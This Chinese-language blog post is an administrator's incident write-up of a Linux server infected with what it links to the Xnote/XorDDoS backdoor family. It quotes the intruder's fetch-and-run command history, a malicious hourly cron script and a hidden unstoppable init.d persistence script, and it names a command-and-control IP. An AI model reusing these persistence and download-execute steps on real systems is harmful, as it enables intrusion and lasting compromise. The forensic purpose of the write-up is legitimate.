服务器遭受的一次攻击
服务器宕机了,没有办法ssh连上
没有办法,去机房,发现服务器仍然开着
查看最后执行的几条命令:
# 保存root用户的命令历史
history > history.log
# 最后的命令
curl ****/ /tmp/hei
chmod 744 hei
./hei
这里有几个问题:
-
查看了下载
hei文件的ip地址,是江苏那一片的,但是我们的服务器,是内部使用的,外网无法访问 -
如果是正常的用户
hei文件为什么会下载在/tmp文件夹
保存了history的历史之后,重启了服务器,但依旧ping不同,然后重启了网卡,好了
# 重启网卡
service network restart
一切刚刚开始。。。
从邮件开始
我以为就这样就结束了,但是。。。
某一天我发现,root用户老是收到一封邮件,有大概上两百封了,内容是相同的,我手动的将它们删掉了。
然而不久之后,我又收到了多封相同的邮件。。。
仔细看了邮件之后,明白了,是下面这条命令执行失败!
# 打开收件箱
mail
# 阅读邮件
& more 邮件标号
cp /lib/udev/udev /lib/udev/debug
/lib/udev/debug
/etc/cron.hourly
在此目录下发现了这个cron.sh文件
cd /etc/cron.hourly
# 查看文件的修改时间
stat cron.sh
etc/cron.hourly/cron.sh 文件内容
#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`;do ifconfig $i up& done
cp /lib/udev/udev /lib/udev/debug
/lib/udev/debug
for循环这条命令很明显,就是重启所有的网卡。
查看了一下,并没有/lib/udev/udev 这个文件存在。所以cp这条命令总是失败,日志系统就起作用了,所以每小时就发送一封邮件给root账户。
删除这个文件之后,果然没有再发邮件了
我又以为结束了
不知道为什么/lib/udev/udev 这个文件消失了,难道是因为执行了了yum update命令更新了系统,导致这个文件没了?原因我并不知道。
然而,总之,没有再发邮件了。。。
命运的相逢,这是天意么
从网络命令开始
过了一段时间,想学一点网络的命令
当使用ss命令的时候,我突然发现了一条很奇怪的ip地址:
ss -p
# 敏感信息*代替了
SYN-SENT 0 1 *.*.*.*:50533 61.160.211.197:uaac users:(("654",21110,5))
多次执行的时候50533 这个端口会不断的改变
SYN-SENT
种种迹象表明,你的服务器在试图连接61.160.211.197:uaac
where are you
# 查找该ip对应的进程pid
netstat -p | less
# 查看对应进程的一些信息,起始时间
ps -aux | grep pid
# 查看进程对应的父进程
ps -ef | grep pid
# 杀死进程
kill -9 pid
然而,进程杀不死,过了几分钟又启动了
/etc/init.d
检查这个目录要仔细,注意隐藏文件
根据上面的stat的命令,以及系统宕机的时间,基本可以确定系统是在03月21号遭受到攻击的
# 查找在3/21号之后修改的文件
touch -t 201603210000.00 TT
find . -newer TT
# 或者直接使用ls,一个个的检索隐藏目录
ls -al
发现了一个可疑的文件.chinaz\{1458543822,内容如下:
#!/bin/sh
# chkconfig: 12345 90 90
# description: .chinaz{1458543822
### BEGIN INIT INFO
# Provides: .chinaz{1458543822
# Required-Start:
# Required-Stop:
# Default-Start: 1 2 3 4 5
# Default-Stop:
# Short-Description: .chinaz{1458543822
### END INIT INFO
case $1 in
start)
/tmp/.chinaz{1458543822
;;
stop)
;;
*)
/tmp/.chinaz{1458543822
;;
esac
可以看到这个服务是无法stop 的, 并且服务的脚本在/tmp 中,当我发现的时候,这个脚本已经没有了。不过在开机的时候应该会自动生成。
但是我们还是有收获的,这是一个开机自启动脚本,运行级别12345,运行序号90
最重要的是:我们获得了一个有意义的名字.chinaz{1458543822 ,它暴露了自己的真名!!!
在很久很久以前的魔法时代,任何一位谨慎的巫师都把自己的真名实姓看作最值得珍视的密藏,同时也是对自己生命的最大威胁 —— 文奇《真名实姓》
现身吧
摘自http://news.drweb.com/show/?i=9272&lng=en&c=5
To spread the new Linux backdoor, dubbed Linux.BackDoor.Xnote.1, criminals mount a brute force attack to establish an SSH connection with a target machine. Doctor Web security researchers believe that the Chinese hacker group ChinaZ may be behind this backdoor.
该网页介绍了该病毒,是Linux.BackDoor.Xnote.1的变种。
Linux.BackDoor.Xnote.1:
http://vms.drweb.com/virus/?_is=1&i=4323517
新的疑惑,一切远未结束。。。
这是你的真名么!
一款隐藏嵌入式Rookit的DDoS木马分析
http://www.freebuf.com/articles/system/58836.html
XorDDos家族:
http://www.aptno1.com/YC/102.html
https://www.fireeye.com/blog/threat-research/2015/02/anatomy_of_a_brutef.html
Linux下随机10字符病毒的清除
http://blog.chinaunix.net/uid-20332519-id-4941140.html